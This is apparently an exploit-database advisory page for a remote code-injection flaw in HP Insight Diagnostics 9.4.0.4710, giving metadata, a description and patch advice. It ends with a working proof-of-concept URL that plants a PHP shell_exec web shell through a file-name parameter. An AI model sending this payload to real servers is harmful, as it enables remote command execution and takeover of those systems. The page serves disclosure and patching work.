HP Insight Diagnostics Remote Code-Injection Vulnerability

vendor:

HP Insight Diagnostics

by:

SecurityFocus

9,3

CVSS

HIGH

Remote Code-Injection

CWE

Product Name: HP Insight Diagnostics

Affected Version From: 9.4.0.4710

Affected Version To: 9.4.0.4710

Patch Exists: Yes

Related CWE: N/A

CPE: a:hewlett_packard:hp_insight_diagnostics

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

HP Insight Diagnostics Remote Code-Injection Vulnerability

HP Insight Diagnostics is prone to a remote code-injection vulnerability. An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application. HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected.

Mitigation:

HP has released a patch to address this issue. Users should upgrade to the latest version of HP Insight Diagnostics.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/60447/info

HP Insight Diagnostics is prone to a remote code-injection vulnerability.

An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application.

HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected.

https://www.example.com/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes